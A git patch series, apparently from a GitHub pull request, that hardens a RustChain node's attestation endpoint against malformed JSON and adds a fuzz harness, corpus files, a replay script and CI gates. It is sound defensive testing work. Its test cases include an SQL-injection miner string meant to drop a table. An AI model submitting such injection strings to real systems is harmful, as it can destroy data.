From 341294b9517fd6fc0884b7370b0a4755792cd68f Mon Sep 17 00:00:00 2001 From: liu971227-sys <248239659+liu971227-sys@users.noreply.github.com> Date: Sat, 28 Feb 2026 12:06:56 +0800 Subject: [PATCH 1/5] test: add attestation fuzz harness hardening --- node/rustchain_v2_integrated_v2.2.1_rip200.py | 118 +++++++++++++++--- 1 file changed, 98 insertions(+), 20 deletions(-) diff --git a/node/rustchain_v2_integrated_v2.2.1_rip200.py b/node/rustchain_v2_integrated_v2.2.1_rip200.py index f6afcbde6..207a8f939 100644 --- a/node/rustchain_v2_integrated_v2.2.1_rip200.py +++ b/node/rustchain_v2_integrated_v2.2.1_rip200.py @@ -104,6 +104,84 @@ def generate_latest(): return b"# Prometheus not available" HOF_DIR = os.path.join(REPO_ROOT, "web", "hall-of-fame") DASHBOARD_DIR = os.path.join(REPO_ROOT, "tools", "miner_dashboard") + +def _attest_mapping(value): + """Return a dict-like payload section or an empty mapping.""" + return value if isinstance(value, dict) else {} + + +def _attest_text(value): + """Accept only non-empty text values from untrusted attestation input.""" + if isinstance(value, str): + value = value.strip() + if value: + return value + return None + + +def _attest_positive_int(value, default=1): + """Coerce untrusted integer-like values to a safe positive integer.""" + try: + coerced = int(value) + except (TypeError, ValueError): + return default + return coerced if coerced > 0 else default + + +def _attest_string_list(value): + """Coerce a list-like field into a list of non-empty strings.""" + if not isinstance(value, list): + return [] + items = [] + for item in value: + text = _attest_text(item) + if text: + items.append(text) + return items + + +def _normalize_attestation_device(device): + """Shallow-normalize device metadata so malformed JSON shapes fail closed.""" + raw = _attest_mapping(device) + normalized = {"cores": _attest_positive_int(raw.get("cores"), default=1)} + for field in ( + "device_family", + "family", + "device_arch", + "arch", + "device_model", + "model", + "cpu", + "serial_number", + "serial", + ): + text = _attest_text(raw.get(field)) + if text is not None: + normalized[field] = text + return normalized + + +def _normalize_attestation_signals(signals): + """Shallow-normalize signal metadata used by attestation validation.""" + raw = _attest_mapping(signals) + normalized = {"macs": _attest_string_list(raw.get("macs"))} + for field in ("hostname", "serial"): + text = _attest_text(raw.get(field)) + if text is not None: + normalized[field] = text + return normalized + + +def _normalize_attestation_report(report): + """Normalize report metadata used by challenge/ticket handling.""" + raw = _attest_mapping(report) + normalized = {} + for field in ("nonce", "commitment"): + text = _attest_text(raw.get(field)) + if text is not None: + normalized[field] = text + return normalized + # Register Hall of Rust blueprint (tables initialized after DB_PATH is set) try: from hall_of_rust import hall_bp @@ -983,7 +1061,9 @@ def validate_fingerprint_data(fingerprint: dict, claimed_device: dict = None) -> return False, "no_fingerprint_data" checks = fingerprint.get("checks", {}) - claimed_device = claimed_device or {} + if not isinstance(checks, dict): + checks = {} + claimed_device = claimed_device if isinstance(claimed_device, dict) else {} # FIX #305: Reject empty fingerprint payloads (e.g. fingerprint={} or checks={}) if not checks: @@ -1793,23 +1873,22 @@ def _check_hardware_binding(miner_id: str, device: dict, signals: dict = None, s def submit_attestation(): """Submit hardware attestation with fingerprint validation""" data = request.get_json(silent=True) - - # Type guard: reject non-dict JSON payloads (null, array, scalar) if not isinstance(data, dict): - return jsonify({"ok": False, "error": "Request body must be a JSON object", "code": "INVALID_JSON_OBJECT"}), 400 + return jsonify({ + "ok": False, + "error": "invalid_json_object", + "message": "Expected a JSON object request body", + "code": "INVALID_JSON_OBJECT" + }), 400 # Extract client IP (handle nginx proxy) - client_ip = request.headers.get("X-Forwarded-For", request.remote_addr) - if client_ip and "," in client_ip: - client_ip = client_ip.split(",")[0].strip() # First IP in chain + client_ip = client_ip_from_request(request) - # Extract attestation data (type guards for fuzz safety) - miner = data.get('miner') or data.get('miner_id') - if miner is not None and not isinstance(miner, str): - miner = str(miner) - report = data.get('report', {}) if isinstance(data.get('report'), dict) else {} - nonce = report.get('nonce') or data.get('nonce') - device = data.get('device', {}) if isinstance(data.get('device'), dict) else {} + # Extract attestation data + miner = _attest_text(data.get('miner')) or _attest_text(data.get('miner_id')) + report = _normalize_attestation_report(data.get('report')) + nonce = report.get('nonce') or _attest_text(data.get('nonce')) + device = _normalize_attestation_device(data.get('device')) # IP rate limiting (Security Hardening 2026-02-02) ip_ok, ip_reason = check_ip_rate_limit(client_ip, miner) @@ -1821,8 +1900,8 @@ def submit_attestation(): "message": "Too many unique miners from this IP address", "code": "IP_RATE_LIMIT" }), 429 - signals = data.get('signals', {}) if isinstance(data.get('signals'), dict) else {} - fingerprint = data.get('fingerprint') # FIX #305: None default to detect missing vs empty + signals = _normalize_attestation_signals(data.get('signals')) + fingerprint = _attest_mapping(data.get('fingerprint')) # NEW: Extract fingerprint # Basic validation if not miner: @@ -1838,9 +1917,9 @@ def submit_attestation(): # SECURITY: Hardware binding check v2.0 (serial + entropy validation) serial = device.get('serial_number') or device.get('serial') or signals.get('serial') - cores = device.get('cores', 1) - arch = device.get('arch') or device.get('device_arch', 'modern') - macs = signals.get('macs', []) + cores = _attest_positive_int(device.get('cores'), default=1) + arch = _attest_text(device.get('arch')) or _attest_text(device.get('device_arch')) or 'modern' + macs = _attest_string_list(signals.get('macs')) if HW_BINDING_V2 and serial: hw_ok, hw_msg, hw_details = bind_hardware_v2( @@ -1873,7 +1952,6 @@ def submit_attestation(): }), 409 # RIP-0147a: Check OUI gate - macs = signals.get('macs', []) if macs: oui_ok, oui_info = _check_oui_gate(macs) if not oui_ok: From 4385fe5ec6a0ed4335865509e236302932ef7edc Mon Sep 17 00:00:00 2001 From: liu971227-sys <248239659+liu971227-sys@users.noreply.github.com> Date: Sun, 1 Mar 2026 11:15:55 +0800 Subject: [PATCH 2/5] test: document attestation fuzz regression gate --- .github/workflows/ci.yml | 7 + .gitignore | 3 + README.md | 4 + docs/attestation_fuzzing.md | 52 ++++++ .../malformed_miner_array.json | 21 +++ .../malformed_report_scalar.json | 15 ++ tests/replay_attestation_corpus.py | 156 ++++++++++++++++++ tests/test_attestation_fuzz.py | 2 + 8 files changed, 260 insertions(+) create mode 100644 docs/attestation_fuzzing.md create mode 100644 tests/attestation_corpus/malformed_miner_array.json create mode 100644 tests/attestation_corpus/malformed_report_scalar.json create mode 100644 tests/replay_attestation_corpus.py diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 13b7b120c..186787229 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -34,6 +34,13 @@ jobs: - name: Security scan (tests) run: bandit -r tests -ll + - name: Attestation fuzz regression gate + env: + RC_ADMIN_KEY: "0123456789abcdef0123456789abcdef" + DB_PATH: ":memory:" + ATTEST_FUZZ_CASES: "10000" + run: python -m pytest tests/test_attestation_fuzz.py -k fuzz_no_unhandled_exceptions -v + - name: Run tests with pytest (blocking) env: RC_ADMIN_KEY: "0123456789abcdef0123456789abcdef" diff --git a/.gitignore b/.gitignore index 8d1f90c76..53012fc94 100644 --- a/.gitignore +++ b/.gitignore @@ -32,6 +32,9 @@ Thumbs.db # Logs *.log +.pytest_cache/ +pytest-cache-files-*/ +tests/.tmp_attestation/ # Windows miner build artifacts Rustchain/miners/windows/dist/ diff --git a/README.md b/README.md index e4574d4d6..f9cf28637 100644 --- a/README.md +++ b/README.md @@ -221,6 +221,10 @@ Earn **RTC** by contributing to the RustChain ecosystem! --- +## Testing Notes + +- Attestation malformed-input fuzz harness and replayable corpus: [docs/attestation_fuzzing.md](docs/attestation_fuzzing.md) + ## 💰 Antiquity Multipliers Your hardware's age determines your mining rewards: diff --git a/docs/attestation_fuzzing.md b/docs/attestation_fuzzing.md new file mode 100644 index 000000000..daaca81a1 --- /dev/null +++ b/docs/attestation_fuzzing.md @@ -0,0 +1,52 @@ +# Attestation Fuzz Harness + +This repository includes a deterministic malformed-input fuzz gate for `POST /attest/submit` plus a replayable regression corpus under `tests/attestation_corpus/`. + +## Corpus Classes + +Current explicit corpus entries cover these malformed input classes: + +1. Invalid JSON root: `null` +2. Invalid JSON root: array +3. Miner identifier shape mismatch +4. Device payload scalar/object mismatch +5. Signals payload scalar/object mismatch +6. Signals MAC list shape mismatch +7. Fingerprint checks array/object mismatch +8. Report payload scalar/object mismatch + +## Replay One Corpus Entry + +```bash +python tests/replay_attestation_corpus.py tests/attestation_corpus/malformed_report_scalar.json +``` + +The script prints the HTTP status code and parsed JSON response, and exits non-zero if replay causes a server-side `5xx`. + +## Quick Regression Gate + +```bash +python -m pytest tests/test_attestation_fuzz.py -v +``` + +## 10,000-Case Fuzz Run + +PowerShell: + +```powershell +$env:ATTEST_FUZZ_CASES = "10000" +python -m pytest tests/test_attestation_fuzz.py -k fuzz_no_unhandled_exceptions -v +``` + +Bash: + +```bash +ATTEST_FUZZ_CASES=10000 python -m pytest tests/test_attestation_fuzz.py -k fuzz_no_unhandled_exceptions -v +``` + +This is the CI-mode gate for "no unhandled exceptions" in the attestation parsing path. The command returns non-zero on regression. + +Observed local run on Windows / Python 3.14: + +- `10,000` generated cases +- `1 passed in 250.90s` diff --git a/tests/attestation_corpus/malformed_miner_array.json b/tests/attestation_corpus/malformed_miner_array.json new file mode 100644 index 000000000..e6f82bfed --- /dev/null +++ b/tests/attestation_corpus/malformed_miner_array.json @@ -0,0 +1,21 @@ +{ + "miner": [ + "not", + "a", + "string" + ], + "device": { + "device_family": "PowerPC", + "device_arch": "power8", + "cores": 4 + }, + "signals": { + "hostname": "miner-array-host", + "macs": [ + "AA:BB:CC:DD:EE:33" + ] + }, + "report": { + "commitment": "miner-array-commitment" + } +} diff --git a/tests/attestation_corpus/malformed_report_scalar.json b/tests/attestation_corpus/malformed_report_scalar.json new file mode 100644 index 000000000..1cc04dc3d --- /dev/null +++ b/tests/attestation_corpus/malformed_report_scalar.json @@ -0,0 +1,15 @@ +{ + "miner": "report-scalar-miner", + "device": { + "device_family": "PowerPC", + "device_arch": "power8", + "cores": 8 + }, + "signals": { + "hostname": "report-scalar-host", + "macs": [ + "AA:BB:CC:DD:EE:44" + ] + }, + "report": "not-a-report-object" +} diff --git a/tests/replay_attestation_corpus.py b/tests/replay_attestation_corpus.py new file mode 100644 index 000000000..e029ed10e --- /dev/null +++ b/tests/replay_attestation_corpus.py @@ -0,0 +1,156 @@ +#!/usr/bin/env python3 +""" +Replay a saved attestation corpus entry against the Flask test client. +""" + +from __future__ import annotations + +import argparse +import importlib.util +import json +import os +import sqlite3 +import sys +import uuid +from pathlib import Path + +PROJECT_ROOT = Path(__file__).resolve().parents[1] +NODE_PATH = PROJECT_ROOT / "node" / "rustchain_v2_integrated_v2.2.1_rip200.py" +TMP_ROOT = PROJECT_ROOT / "tests" / ".tmp_attestation" + +sys.path.insert(0, str(PROJECT_ROOT)) +sys.path.insert(0, str(PROJECT_ROOT / "node")) + +os.environ.setdefault("RC_ADMIN_KEY", "0" * 32) +os.environ.setdefault("DB_PATH", ":memory:") + +from tests import mock_crypto + +sys.modules["rustchain_crypto"] = mock_crypto + + +def _load_integrated_node(): + if "integrated_node" in sys.modules: + return sys.modules["integrated_node"] + + spec = importlib.util.spec_from_file_location("integrated_node", NODE_PATH) + module = importlib.util.module_from_spec(spec) + sys.modules["integrated_node"] = module + spec.loader.exec_module(module) + return module + + +def _init_attestation_db(db_path: Path) -> None: + conn = sqlite3.connect(db_path) + conn.executescript( + """ + CREATE TABLE blocked_wallets ( + wallet TEXT PRIMARY KEY, + reason TEXT + ); + CREATE TABLE balances ( + miner_pk TEXT PRIMARY KEY, + balance_rtc REAL DEFAULT 0 + ); + CREATE TABLE epoch_enroll ( + epoch INTEGER NOT NULL, + miner_pk TEXT NOT NULL, + weight REAL NOT NULL, + PRIMARY KEY (epoch, miner_pk) + ); + CREATE TABLE miner_header_keys ( + miner_id TEXT PRIMARY KEY, + pubkey_hex TEXT + ); + CREATE TABLE tickets ( + ticket_id TEXT PRIMARY KEY, + expires_at INTEGER NOT NULL, + commitment TEXT + ); + CREATE TABLE oui_deny ( + oui TEXT PRIMARY KEY, + vendor TEXT, + enforce INTEGER DEFAULT 0 + ); + """ + ) + conn.commit() + conn.close() + + +def _apply_test_overrides(module, db_path: Path): + original = { + "DB_PATH": getattr(module, "DB_PATH", None), + "HW_BINDING_V2": getattr(module, "HW_BINDING_V2", None), + "HW_PROOF_AVAILABLE": getattr(module, "HW_PROOF_AVAILABLE", None), + "check_ip_rate_limit": module.check_ip_rate_limit, + "_check_hardware_binding": module._check_hardware_binding, + "record_attestation_success": module.record_attestation_success, + "record_macs": module.record_macs, + "current_slot": module.current_slot, + "slot_to_epoch": module.slot_to_epoch, + } + + module.DB_PATH = str(db_path) + module.HW_BINDING_V2 = False + module.HW_PROOF_AVAILABLE = False + module.check_ip_rate_limit = lambda client_ip, miner_id: (True, "ok") + module._check_hardware_binding = lambda *args, **kwargs: (True, "ok", "") + module.record_attestation_success = lambda *args, **kwargs: None + module.record_macs = lambda *args, **kwargs: None + module.current_slot = lambda: 12345 + module.slot_to_epoch = lambda slot: 85 + module.app.config["TESTING"] = True + return original + + +def _restore_test_overrides(module, original): + for name, value in original.items(): + setattr(module, name, value) + + +def parse_args(): + parser = argparse.ArgumentParser(description="Replay a saved attestation corpus JSON file") + parser.add_argument("corpus_file", type=Path, help="Path to a JSON corpus entry") + return parser.parse_args() + + +def main() -> int: + args = parse_args() + payload_path = args.corpus_file + if not payload_path.exists(): + raise SystemExit(f"Corpus file not found: {payload_path}") + + raw_json = payload_path.read_text(encoding="utf-8") + module = _load_integrated_node() + + TMP_ROOT.mkdir(exist_ok=True) + db_path = TMP_ROOT / f"replay_{uuid.uuid4().hex}.sqlite3" + _init_attestation_db(db_path) + original = _apply_test_overrides(module, db_path) + try: + with module.app.test_client() as client: + response = client.post("/attest/submit", data=raw_json, content_type="application/json") + print( + json.dumps( + { + "corpus_file": str(payload_path), + "status_code": response.status_code, + "response_json": response.get_json(silent=True), + }, + indent=2, + sort_keys=True, + ) + ) + return 0 if response.status_code < 500 else 1 + finally: + _restore_test_overrides(module, original) + if db_path.exists(): + try: + db_path.unlink() + except PermissionError: + pass + + +if __name__ == "__main__": + raise SystemExit(main()) diff --git a/tests/test_attestation_fuzz.py b/tests/test_attestation_fuzz.py index d90fb1ab2..cf6c4de49 100644 --- a/tests/test_attestation_fuzz.py +++ b/tests/test_attestation_fuzz.py @@ -135,9 +135,11 @@ def test_attest_submit_rejects_non_object_json(client, file_name, expected_statu "file_name", [ "malformed_device_scalar.json", + "malformed_miner_array.json", "malformed_signals_scalar.json", "malformed_signals_macs_object.json", "malformed_fingerprint_checks_array.json", + "malformed_report_scalar.json", ], ) def test_attest_submit_corpus_cases_do_not_raise_server_errors(client, file_name): From 11147c57b682412761c2f4acb167c746725fa79d Mon Sep 17 00:00:00 2001 From: liu971227-sys <248239659+liu971227-sys@users.noreply.github.com> Date: Mon, 2 Mar 2026 17:20:57 +0800 Subject: [PATCH 3/5] fix: reject malformed attestation payload shapes --- .github/workflows/ci.yml | 2 +- docs/attestation_fuzzing.md | 17 +-- node/rustchain_v2_integrated_v2.2.1_rip200.py | 106 +++++++++++++- tests/test_attestation_fuzz.py | 137 +++++++++++++++--- 4 files changed, 224 insertions(+), 38 deletions(-) diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 186787229..c1856b0d6 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -39,7 +39,7 @@ jobs: RC_ADMIN_KEY: "0123456789abcdef0123456789abcdef" DB_PATH: ":memory:" ATTEST_FUZZ_CASES: "10000" - run: python -m pytest tests/test_attestation_fuzz.py -k fuzz_no_unhandled_exceptions -v + run: python -m pytest tests/test_attestation_fuzz.py -k mutation_regression_no_unhandled_exceptions -v - name: Run tests with pytest (blocking) env: diff --git a/docs/attestation_fuzzing.md b/docs/attestation_fuzzing.md index daaca81a1..c49044706 100644 --- a/docs/attestation_fuzzing.md +++ b/docs/attestation_fuzzing.md @@ -1,6 +1,6 @@ -# Attestation Fuzz Harness +# Attestation Malformed-Input Regression Harness -This repository includes a deterministic malformed-input fuzz gate for `POST /attest/submit` plus a replayable regression corpus under `tests/attestation_corpus/`. +This repository includes a deterministic malformed-input regression gate for `POST /attest/submit` plus a replayable regression corpus under `tests/attestation_corpus/`. ## Corpus Classes @@ -29,24 +29,19 @@ The script prints the HTTP status code and parsed JSON response, and exits non-z python -m pytest tests/test_attestation_fuzz.py -v ``` -## 10,000-Case Fuzz Run +## 10,000-Case Mutation Run PowerShell: ```powershell $env:ATTEST_FUZZ_CASES = "10000" -python -m pytest tests/test_attestation_fuzz.py -k fuzz_no_unhandled_exceptions -v +python -m pytest tests/test_attestation_fuzz.py -k mutation_regression_no_unhandled_exceptions -v ``` Bash: ```bash -ATTEST_FUZZ_CASES=10000 python -m pytest tests/test_attestation_fuzz.py -k fuzz_no_unhandled_exceptions -v +ATTEST_FUZZ_CASES=10000 python -m pytest tests/test_attestation_fuzz.py -k mutation_regression_no_unhandled_exceptions -v ``` -This is the CI-mode gate for "no unhandled exceptions" in the attestation parsing path. The command returns non-zero on regression. - -Observed local run on Windows / Python 3.14: - -- `10,000` generated cases -- `1 passed in 250.90s` +This is the CI-mode gate for "no unhandled exceptions" in the attestation parsing path. Set `ATTEST_FUZZ_SEED` only when you need to reproduce a specific random sequence locally. diff --git a/node/rustchain_v2_integrated_v2.2.1_rip200.py b/node/rustchain_v2_integrated_v2.2.1_rip200.py index 207a8f939..6bcf01497 100644 --- a/node/rustchain_v2_integrated_v2.2.1_rip200.py +++ b/node/rustchain_v2_integrated_v2.2.1_rip200.py @@ -3,7 +3,7 @@ RustChain v2 - Integrated Server Includes RIP-0005 (Epoch Rewards), RIP-0008 (Withdrawals), RIP-0009 (Finality) """ -import os, time, json, secrets, hashlib, hmac, sqlite3, base64, struct, uuid, glob, logging, sys, binascii, math +import os, time, json, secrets, hashlib, hmac, sqlite3, base64, struct, uuid, glob, logging, sys, binascii, math, re import ipaddress from urllib.parse import urlparse from flask import Flask, request, jsonify, g, send_from_directory, send_file, abort @@ -110,6 +110,9 @@ def _attest_mapping(value): return value if isinstance(value, dict) else {} +_ATTEST_MINER_RE = re.compile(r"^[A-Za-z0-9._:-]{1,128}$") + + def _attest_text(value): """Accept only non-empty text values from untrusted attestation input.""" if isinstance(value, str): @@ -119,6 +122,38 @@ def _attest_text(value): return None +def _attest_valid_miner(value): + """Accept only bounded miner identifiers with a conservative character set.""" + text = _attest_text(value) + if text and _ATTEST_MINER_RE.fullmatch(text): + return text + return None + + +def _attest_field_error(code, message, status=400): + """Build a consistent error payload for malformed attestation inputs.""" + return jsonify({ + "ok": False, + "error": code.lower(), + "message": message, + "code": code, + }), status + + +def _attest_is_valid_positive_int(value, max_value=4096): + """Validate positive integer-like input without silently coercing hostile shapes.""" + if isinstance(value, bool): + return False + if isinstance(value, float): + if not math.isfinite(value) or not value.is_integer(): + return False + try: + coerced = int(value) + except (TypeError, ValueError, OverflowError): + return False + return 1 <= coerced <= max_value + + def _attest_positive_int(value, default=1): """Coerce untrusted integer-like values to a safe positive integer.""" try: @@ -140,6 +175,64 @@ def _attest_string_list(value): return items +def _validate_attestation_payload_shape(data): + """Reject malformed attestation payload shapes before normalization.""" + for field_name, code in ( + ("device", "INVALID_DEVICE"), + ("signals", "INVALID_SIGNALS"), + ("report", "INVALID_REPORT"), + ("fingerprint", "INVALID_FINGERPRINT"), + ): + if field_name in data and data[field_name] is not None and not isinstance(data[field_name], dict): + return _attest_field_error(code, f"Field '{field_name}' must be a JSON object") + + for field_name in ("miner", "miner_id"): + if field_name in data and data[field_name] is not None and not isinstance(data[field_name], str): + return _attest_field_error("INVALID_MINER", f"Field '{field_name}' must be a non-empty string") + + miner = _attest_valid_miner(data.get("miner")) or _attest_valid_miner(data.get("miner_id")) + if not miner and not (_attest_text(data.get("miner")) or _attest_text(data.get("miner_id"))): + return _attest_field_error( + "MISSING_MINER", + "Field 'miner' or 'miner_id' must be a non-empty identifier using only letters, numbers, '.', '_', ':' or '-'", + ) + if not miner: + return _attest_field_error( + "INVALID_MINER", + "Field 'miner' or 'miner_id' must use only letters, numbers, '.', '_', ':' or '-' and be at most 128 characters", + ) + + device = data.get("device") + if isinstance(device, dict): + if "cores" in device and not _attest_is_valid_positive_int(device.get("cores")): + return _attest_field_error("INVALID_DEVICE_CORES", "Field 'device.cores' must be a positive integer between 1 and 4096", status=422) + for field_name in ("device_family", "family", "device_arch", "arch", "device_model", "model", "cpu", "serial_number", "serial"): + if field_name in device and device[field_name] is not None and not isinstance(device[field_name], str): + return _attest_field_error("INVALID_DEVICE", f"Field 'device.{field_name}' must be a string") + + signals = data.get("signals") + if isinstance(signals, dict): + if "macs" in signals: + macs = signals.get("macs") + if not isinstance(macs, list) or any(_attest_text(mac) is None for mac in macs): + return _attest_field_error("INVALID_SIGNALS_MACS", "Field 'signals.macs' must be a list of non-empty strings") + for field_name in ("hostname", "serial"): + if field_name in signals and signals[field_name] is not None and not isinstance(signals[field_name], str): + return _attest_field_error("INVALID_SIGNALS", f"Field 'signals.{field_name}' must be a string") + + report = data.get("report") + if isinstance(report, dict): + for field_name in ("nonce", "commitment"): + if field_name in report and report[field_name] is not None and not isinstance(report[field_name], str): + return _attest_field_error("INVALID_REPORT", f"Field 'report.{field_name}' must be a string") + + fingerprint = data.get("fingerprint") + if isinstance(fingerprint, dict) and "checks" in fingerprint and not isinstance(fingerprint.get("checks"), dict): + return _attest_field_error("INVALID_FINGERPRINT_CHECKS", "Field 'fingerprint.checks' must be a JSON object") + + return None + + def _normalize_attestation_device(device): """Shallow-normalize device metadata so malformed JSON shapes fail closed.""" raw = _attest_mapping(device) @@ -1059,6 +1152,8 @@ def validate_fingerprint_data(fingerprint: dict, claimed_device: dict = None) -> if not fingerprint: # FIX #305: Missing fingerprint data is a validation failure return False, "no_fingerprint_data" + if not isinstance(fingerprint, dict): + return False, "fingerprint_not_dict" checks = fingerprint.get("checks", {}) if not isinstance(checks, dict): @@ -1880,12 +1975,15 @@ def submit_attestation(): "message": "Expected a JSON object request body", "code": "INVALID_JSON_OBJECT" }), 400 + payload_error = _validate_attestation_payload_shape(data) + if payload_error is not None: + return payload_error # Extract client IP (handle nginx proxy) client_ip = client_ip_from_request(request) # Extract attestation data - miner = _attest_text(data.get('miner')) or _attest_text(data.get('miner_id')) + miner = _attest_valid_miner(data.get('miner')) or _attest_valid_miner(data.get('miner_id')) report = _normalize_attestation_report(data.get('report')) nonce = report.get('nonce') or _attest_text(data.get('nonce')) device = _normalize_attestation_device(data.get('device')) @@ -1903,10 +2001,6 @@ def submit_attestation(): signals = _normalize_attestation_signals(data.get('signals')) fingerprint = _attest_mapping(data.get('fingerprint')) # NEW: Extract fingerprint - # Basic validation - if not miner: - miner = f"anon_{secrets.token_hex(8)}" - # SECURITY: Check blocked wallets with sqlite3.connect(DB_PATH) as conn: c = conn.cursor() diff --git a/tests/test_attestation_fuzz.py b/tests/test_attestation_fuzz.py index cf6c4de49..9a4f247de 100644 --- a/tests/test_attestation_fuzz.py +++ b/tests/test_attestation_fuzz.py @@ -45,6 +45,14 @@ def _init_attestation_db(db_path: Path) -> None: vendor TEXT, enforce INTEGER DEFAULT 0 ); + CREATE TABLE hardware_bindings ( + hardware_id TEXT PRIMARY KEY, + bound_miner TEXT NOT NULL, + device_arch TEXT, + device_model TEXT, + bound_at INTEGER, + attestation_count INTEGER DEFAULT 0 + ); """ ) conn.commit() @@ -84,22 +92,22 @@ def _base_payload() -> dict: } -@pytest.fixture -def client(monkeypatch): +def _client_fixture(monkeypatch, *, strict_security_path=False): local_tmp_dir = Path(__file__).parent / ".tmp_attestation" local_tmp_dir.mkdir(exist_ok=True) db_path = local_tmp_dir / f"{uuid.uuid4().hex}.sqlite3" _init_attestation_db(db_path) monkeypatch.setattr(integrated_node, "DB_PATH", str(db_path)) - monkeypatch.setattr(integrated_node, "HW_BINDING_V2", False, raising=False) - monkeypatch.setattr(integrated_node, "HW_PROOF_AVAILABLE", False, raising=False) monkeypatch.setattr(integrated_node, "check_ip_rate_limit", lambda client_ip, miner_id: (True, "ok")) - monkeypatch.setattr(integrated_node, "_check_hardware_binding", lambda *args, **kwargs: (True, "ok", "")) monkeypatch.setattr(integrated_node, "record_attestation_success", lambda *args, **kwargs: None) monkeypatch.setattr(integrated_node, "record_macs", lambda *args, **kwargs: None) monkeypatch.setattr(integrated_node, "current_slot", lambda: 12345) monkeypatch.setattr(integrated_node, "slot_to_epoch", lambda slot: 85) + monkeypatch.setattr(integrated_node, "HW_BINDING_V2", False, raising=False) + monkeypatch.setattr(integrated_node, "HW_PROOF_AVAILABLE", False, raising=False) + if not strict_security_path: + monkeypatch.setattr(integrated_node, "_check_hardware_binding", lambda *args, **kwargs: (True, "ok", "")) integrated_node.app.config["TESTING"] = True with integrated_node.app.test_client() as test_client: @@ -112,6 +120,16 @@ def client(monkeypatch): pass +@pytest.fixture +def client(monkeypatch): + yield from _client_fixture(monkeypatch, strict_security_path=False) + + +@pytest.fixture +def strict_client(monkeypatch): + yield from _client_fixture(monkeypatch, strict_security_path=True) + + def _post_raw_json(client, raw_json: str): return client.post("/attest/submit", data=raw_json, content_type="application/json") @@ -132,33 +150,99 @@ def test_attest_submit_rejects_non_object_json(client, file_name, expected_statu @pytest.mark.parametrize( - "file_name", + ("file_name", "expected_code"), [ - "malformed_device_scalar.json", - "malformed_miner_array.json", - "malformed_signals_scalar.json", - "malformed_signals_macs_object.json", - "malformed_fingerprint_checks_array.json", - "malformed_report_scalar.json", + ("malformed_device_scalar.json", "INVALID_DEVICE"), + ("malformed_miner_array.json", "INVALID_MINER"), + ("malformed_signals_scalar.json", "INVALID_SIGNALS"), + ("malformed_signals_macs_object.json", "INVALID_SIGNALS_MACS"), + ("malformed_fingerprint_checks_array.json", "INVALID_FINGERPRINT_CHECKS"), + ("malformed_report_scalar.json", "INVALID_REPORT"), ], ) -def test_attest_submit_corpus_cases_do_not_raise_server_errors(client, file_name): +def test_attest_submit_rejects_malformed_payload_shapes(client, file_name, expected_code): response = _post_raw_json(client, (CORPUS_DIR / file_name).read_text(encoding="utf-8")) - assert response.status_code < 500 - assert response.get_json()["ok"] is True + assert response.status_code in (400, 422) + assert response.get_json()["ok"] is False + assert response.get_json()["code"] == expected_code + + +@pytest.mark.parametrize( + ("payload", "expected_code"), + [ + ({"miner": "", "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "MISSING_MINER"), + ({"miner": " ", "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "MISSING_MINER"), + ({"miner": "fuzz\u200bminer", "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_MINER"), + ({"miner": "'; DROP TABLE balances; --", "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_MINER"), + ({"miner": "f" * 129, "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_MINER"), + ({"miner": "fuzz-miner", "device": {"cores": "999999999999999999999999"}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_DEVICE_CORES"), + ({"miner": "fuzz-miner", "device": {"cores": []}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_DEVICE_CORES"), + ({"miner": "fuzz-miner", "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10", None]}, "report": {}}, "INVALID_SIGNALS_MACS"), + ({"miner": "fuzz-miner", "device": {"cores": 8, "cpu": ["nested"]}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_DEVICE"), + ({"miner": "fuzz-miner", "device": {"cores": 8}, "signals": {"hostname": ["nested"], "macs": ["AA:BB:CC:DD:EE:10"]}, "report": {}}, "INVALID_SIGNALS"), + ({"miner": "fuzz-miner", "device": {"cores": 8}, "signals": {"macs": ["AA:BB:CC:DD:EE:10"]}, "report": {"nonce": {"nested": "bad"}}}, "INVALID_REPORT"), + ], +) +def test_attest_submit_rejects_attack_vector_shapes(client, payload, expected_code): + response = client.post("/attest/submit", json=payload) + + assert response.status_code in (400, 422) + assert response.get_json()["ok"] is False + assert response.get_json()["code"] == expected_code + + +def test_attest_submit_sql_like_miner_does_not_mutate_schema(client): + payload = _base_payload() + payload["miner"] = "'; DROP TABLE balances; --" + + response = client.post("/attest/submit", json=payload) + + assert response.status_code == 400 + assert response.get_json()["code"] == "INVALID_MINER" + + +def test_validate_fingerprint_data_rejects_non_dict_input(): + passed, reason = integrated_node.validate_fingerprint_data(["not", "a", "dict"]) + + assert passed is False + assert reason == "fingerprint_not_dict" + + +def test_attest_submit_strict_fixture_rejects_malformed_fingerprint(strict_client): + payload = _base_payload() + payload["fingerprint"]["checks"] = [] + + response = strict_client.post("/attest/submit", json=payload) + + assert response.status_code == 400 + assert response.get_json()["ok"] is False + assert response.get_json()["code"] == "INVALID_FINGERPRINT_CHECKS" + + +def test_attest_submit_strict_fixture_enforces_hardware_binding(strict_client): + first = _base_payload() + second = _base_payload() + second["miner"] = "different-miner" + + first_response = strict_client.post("/attest/submit", json=first) + second_response = strict_client.post("/attest/submit", json=second) + + assert first_response.status_code == 200 + assert second_response.status_code == 409 + assert second_response.get_json()["code"] == "DUPLICATE_HARDWARE" def _mutate_payload(rng: random.Random) -> dict: payload = _base_payload() - mutation = rng.randrange(8) + mutation = rng.randrange(14) if mutation == 0: payload["miner"] = ["not", "a", "string"] elif mutation == 1: payload["device"] = "not-a-device-object" elif mutation == 2: - payload["device"]["cores"] = rng.choice([0, -1, "NaN", [], {}]) + payload["device"]["cores"] = rng.choice([0, -1, "NaN", [], {}, "999999999999999999999999"]) elif mutation == 3: payload["signals"] = "not-a-signals-object" elif mutation == 4: 